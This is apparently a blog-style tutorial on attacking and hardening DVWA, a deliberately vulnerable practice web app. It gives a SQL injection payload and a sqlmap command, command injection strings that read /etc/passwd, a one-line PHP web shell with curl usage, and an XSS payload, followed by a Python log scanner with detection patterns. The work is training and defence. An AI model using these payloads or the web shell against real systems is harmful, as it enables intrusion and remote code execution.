Penetration Testing Report of DVWA

DVWA (Damn Vulnerable Web Application) is a widely used platform for practicing penetration testing skills. Below is a detailed breakdown of key techniques, commands, and steps to exploit and secure DVWA.

You Should Know:

1. Setting Up DVWA

  • Download DVWA from the official GitHub repository:
    git clone https://github.com/digininja/DVWA.git 
    
  • Move the files to your web server (e.g., Apache):
    sudo cp -r DVWA /var/www/html/ 
    
  • Configure the database:
    sudo mysql -u root -p 
    CREATE DATABASE dvwa; 
    CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'p@ssw0rd'; 
    GRANT ALL ON dvwa.* TO 'dvwa'@'localhost'; 
    FLUSH PRIVILEGES; 
    exit 
    
  • Update DVWA config (/var/www/html/DVWA/config/config.inc.php):
    $_DVWA[ 'db_user' ] = 'dvwa'; 
    $_DVWA[ 'db_password' ] = 'p@ssw0rd'; 
    $_DVWA[ 'db_database' ] = 'dvwa'; 
    

2. Common Exploits & Commands

SQL Injection

  • Basic SQLi payload:
    ' OR '1'='1 
    
  • Using `sqlmap` for automation:
    sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1" --cookie="security=low; PHPSESSID=abc123" --dbs 
    

Command Injection

  • Exploit command execution vulnerability:
    ; ls -la /etc/passwd 
    
  • Test with curl:
    curl -X POST "http://localhost/DVWA/vulnerabilities/exec/" --data "ip=127.0.0.1; whoami" --cookie "security=low; PHPSESSID=abc123" 
    

File Upload Exploitation

  • Upload a PHP web shell (shell.php):
    <?php system($_GET['cmd']); ?> 
    
  • Execute commands via the uploaded file:
    curl "http://localhost/DVWA/hackable/uploads/shell.php?cmd=id" 
    

Cross-Site Scripting (XSS)

  • Stored XSS payload:
    <script>alert('XSS')</script> 
    
  • Test with `Burp Suite` or manually in input fields.

3. Securing DVWA

  • Set security level to `high` in DVWA settings.
  • Disable dangerous PHP functions in php.ini:
    disable_functions = exec, shell_exec, system, passthru 
    
  • Implement WAF rules (e.g., ModSecurity):
    sudo apt install modsecurity-crs 
    

What Undercode Says

DVWA is an excellent tool for learning penetration testing, but always use it ethically. Practice hardening techniques, monitor logs (/var/log/apache2/access.log), and apply patches. Automation with Metasploit, Nmap, and `Burp Suite` enhances testing efficiency.
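
To make the log-monitoring advice concrete, the following added example (not part of the original post or of DVWA) scans Apache combined-format access-log lines for the request shapes shown above. The rule names, regular expressions and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote, unquote_plus

# Apache "combined" format: host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# rule name -> (request part inspected, pattern). Patterns mirror the payload shapes
# listed on this page; they are illustrative, not a complete signature set.
RULES = {
    "sqli_tautology": ("query", re.compile(r"'\s*or\s*'?\w+'?\s*=\s*'?\w+", re.I)),
    "script_tag": ("query", re.compile(r"<\s*script\b", re.I)),
    "php_in_uploads": ("path", re.compile(r"/hackable/uploads/[^/]+\.ph(p\d?|tml)$", re.I)),
}

def scan_line(line):
    """Return (client, method, status, [rule names]) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, target, status = m.groups()
    parts = urlsplit(target)
    # Decode percent-encoding before matching, otherwise %27 and %3C hide the payload.
    fields = {"path": unquote(parts.path), "query": unquote_plus(parts.query)}
    hits = [name for name, (field, rx) in RULES.items() if rx.search(fields[field])]
    return client, method, int(status), hits

def scan_log(lines):
    """Map each client address to the sorted rule names it triggered."""
    found = defaultdict(set)
    for line in lines:
        parsed = scan_line(line)
        if parsed and parsed[3]:
            found[parsed[0]].update(parsed[3])
    return {client: sorted(rules) for client, rules in found.items()}

# Constructed sample lines (not captured traffic), shaped like the requests on this page.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1%27+OR+%271%27%3D%271&Submit=Submit HTTP/1.1" 200 1523 "-" "curl/8.0"',
    '192.0.2.10 - - [01/Jan/2025:10:00:05 +0000] "GET /DVWA/hackable/uploads/shell.php?cmd=id HTTP/1.1" 200 54 "-" "curl/8.0"',
    '192.0.2.10 - - [01/Jan/2025:10:00:09 +0000] "POST /DVWA/vulnerabilities/exec/ HTTP/1.1" 200 4321 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Jan/2025:10:01:00 +0000] "GET /DVWA/index.php HTTP/1.1" 200 6789 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, rules in scan_log(SAMPLE_LOG).items():
        print(client, rules)
```

The POST to /vulnerabilities/exec/ produces no hit because the access log does not record request bodies, so the command injection and stored XSS tests above are only visible with body-level logging such as the ModSecurity audit log.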

Expected Output:

  • Successful SQLi exploitation reveals database contents.
  • Command injection returns server-side command outputs.
  • Uploaded shells allow remote code execution.
  • XSS payloads trigger browser alerts.

Reported By: Penetester Squad – Hackers Feeds